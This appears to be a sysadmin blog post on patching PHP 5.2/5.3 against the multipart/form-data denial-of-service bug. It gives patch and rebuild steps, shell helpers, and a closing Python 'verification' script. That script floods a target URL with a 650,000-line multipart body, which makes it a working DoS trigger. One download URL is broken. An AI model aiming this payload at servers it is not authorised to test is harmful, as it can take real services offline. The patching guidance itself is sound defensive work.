Patching the PHP multipart/form-data vulnerability

Today I saw the PHP multipart/form-data remote DoS vulnerability on WooYun and immediately got in touch with a colleague to patch our production servers. First, a reference: there is a tutorial for compiling and installing nginx + php-fpm + mysql on CentOS. If you installed the same way I did, you can follow the steps below as-is; if not, treat them as a guide and adapt the paths to your own setup.

System: CentOS 5.x (64-bit)

Required file: php-5.2-multipart-form-data.patch

1. Check your PHP version

  php -v
  PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)
  Copyright (c) 1997-2010 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

If your version is higher than 5.3, just upgrade PHP to a fixed release instead of patching.

2. Download the patch file

  wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
  # or
  wget/php_patch/php-5.2-multipart-form-data.patch

3. Apply the patch

  5.2:
  cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
  cd php-5.2.17
  patch -p1 < php-5.2-multipart-form-data.patch
  5.3:
  wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
  patch -p1 < php-5.3-multipart-form-data.patch

Delete lines 42 to 45 (the version check below):

  if [ "$php_version" == "$old_php_version" ]; then
  echo "Error: The upgrade PHP Version is the same as the old Version!!"
  exit 1
  fi

4. Recompile PHP

  ./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log \
  --with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc \
  --with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl \
  --enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext --with-mhash \
  --enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv \
  --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear

PS: you should check the configure parameters your own PHP was built with and reuse those rather than copying mine: php -i | grep configure

make && make install
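To tie steps 1 and 4 together, here are a few POSIX shell helpers, an added example that is not part of the original post or of the vpser patch: one extracts the major.minor version from `php -v` output, one maps it to the patch file the post uses for that branch (any other version falls through to the upgrade route), and one pulls the original configure arguments out of `php -i` output so the rebuild reuses the flags the running binary was built with. The `php -v` and `php -i` lines below are constructed samples, and the `Configure Command =>` line format is an assumption about `php -i` output.

```shell
#!/bin/sh
# Added example, not from the original post. Helpers for steps 1 and 4.

# Constructed sample of `php -v` output (mirrors the post).
SAMPLE_PHP_V='PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies'

# Constructed sample of the relevant `php -i` line (format assumed).
SAMPLE_PHP_I="Configure Command =>  './configure' '--prefix=/usr/local/php' '--enable-fastcgi' '--enable-fpm' '--with-mysql=/usr/local/mysql'"

php_major_minor() {
  # $1: full `php -v` output; prints the major.minor part, e.g. 5.2
  printf '%s\n' "$1" | sed -n 's/^PHP \([0-9]*\.[0-9]*\)\..*/\1/p' | head -n 1
}

patch_file_for() {
  # $1: major.minor; prints the patch name the post uses for that branch.
  # Returns non-zero for any other branch, meaning "upgrade PHP instead".
  case "$1" in
    5.2) echo php-5.2-multipart-form-data.patch ;;
    5.3) echo php-5.3-multipart-form-data.patch ;;
    *) return 1 ;;
  esac
}

configure_args() {
  # $1: `php -i` output; prints the original configure arguments without the
  # leading './configure', still single-quoted, so the rebuild can reuse them:
  #   eval ./configure $(configure_args "$(php -i)")
  printf '%s\n' "$1" | sed -n "s/^Configure Command =>[[:space:]]*'\.\/configure'[[:space:]]*//p"
}

# Demo against the constructed samples; on a real host pass "$(php -v)" and "$(php -i)".
ver=$(php_major_minor "$SAMPLE_PHP_V")
if patch=$(patch_file_for "$ver"); then
  echo "PHP $ver: apply $patch, then rebuild with:"
  echo "  ./configure $(configure_args "$SAMPLE_PHP_I")"
else
  echo "PHP $ver: no patch for this branch, upgrade PHP instead"
fi
```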

Done, that takes care of the vulnerability. How do you verify it? The script below times a POST with a large multipart body; since its thresholds are fixed, compare the result against your server's normal response time before drawing a conclusion:

  cat dd.py
  '''
  Author: Shusheng Liu,The Department of Security Cloud, Baidu
  email: liusscs@163.com
  '''
  import sys
  import urllib, urllib2
  import datetime
  from optparse import OptionParser

  def http_proxy(proxy_url):
      # Route all requests through an HTTP proxy (optional, see main()).
      proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
      opener = urllib2.build_opener(proxy_handler)
      urllib2.install_opener(opener)
  # end http_proxy

  def check_php_multipartform_dos(url, post_body, headers):
      # POST the body and time the response; an unpatched server spends a long
      # time parsing the many-line multipart header, a patched one does not.
      req = urllib2.Request(url)
      for key in headers.keys():
          req.add_header(key, headers[key])
      starttime = datetime.datetime.now()
      fd = urllib2.urlopen(req, post_body)
      html = fd.read()
      endtime = datetime.datetime.now()
      usetime = (endtime - starttime).seconds
      if usetime > 5:
          result = url + " is vulnerable"
      elif usetime > 3:
          result = "need to check normal respond time"
      else:
          # The original left result unset here, which raised UnboundLocalError.
          result = url + " responded quickly (patched or not vulnerable)"
      return [result, usetime]
  # end

  def main():
      # http_proxy("http://127.0.0.1:8089")
      parser = OptionParser()
      parser.add_option("-t", "--target", action="store",
                        dest="target",
                        default=False,
                        type="string",
                        help="test target")
      (options, args) = parser.parse_args()
      if options.target:
          target = options.target
      else:
          return
      Num = 650000
      headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
                 'Accept-Encoding': 'gzip, deflate',
                 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
      # Multipart part header followed by Num short continuation lines.
      body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
      payload = ""
      for i in range(0, Num):
          payload = payload + "a\n"
      body = body + payload
      body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
      print "starting..."
      respond = check_php_multipartform_dos(target, body, headers)
      print "Result : "
      print respond[0]
      print "Respond time : " + str(respond[1]) + " seconds"

  if __name__ == "__main__":
      main()
This script is for detection only; if anyone uses it to do harm, that has nothing to do with this site.